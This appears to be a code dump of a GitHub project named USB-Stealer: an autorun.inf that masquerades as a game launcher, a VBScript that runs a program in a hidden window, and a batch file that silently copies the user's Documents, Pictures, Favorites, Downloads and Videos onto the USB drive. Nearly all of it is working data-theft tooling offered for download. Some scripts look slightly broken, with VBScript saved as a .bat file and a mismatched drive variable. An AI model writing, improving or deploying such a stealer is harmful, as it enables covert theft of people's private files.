├── images ├── demo.png ├── usb.png ├── use.gif └── usb-stealer-ascii.png ├── invisible.vbs ├── launch.bat ├── autorun.inf ├── file.bat └── README.md /images/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/demo.png -------------------------------------------------------------------------------- /images/usb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/usb.png -------------------------------------------------------------------------------- /images/use.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/use.gif -------------------------------------------------------------------------------- /invisible.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /launch.bat: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False 2 | -------------------------------------------------------------------------------- /images/usb-stealer-ascii.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/skylartr/USB-Stealer/HEAD/images/usb-stealer-ascii.png -------------------------------------------------------------------------------- /autorun.inf: -------------------------------------------------------------------------------- 1 | [autorun] 2 | icon=drive.ico 3 | open=launch.bat 4 | action=Click ok to Run game for Windows 5 | shell\open\command=launch.bat -------------------------------------------------------------------------------- /file.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | title USB-Stealer 3 | color 2 4 | SET odrive=%odrive:~0,2% 5 | set backupcmd=xcopy /s /c /d /e /h /i /r /y 6 | cls 7 | echo on 8 | %backupcmd% "%USERPROFILE%\Documents" "%drive%\all\Documents" 9 | %backupcmd% "%USERPROFILE%\pictures" "%drive%\all\My pics" 10 | %backupcmd% "%USERPROFILE%\Favorites" "%drive%\all\Favorites" 11 | %backupcmd% "%USERPROFILE%\Downloads" "%drive%\all\Downloads" 12 | %backupcmd% "%USERPROFILE%\videos" "%drive%\all\videos" 13 | @echo off 14 | cls 15 | exit 16 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 |
6 | 7 | ## Installation 8 | Download from [releases](https://github.com/skylartr/USB-Stealer/releases)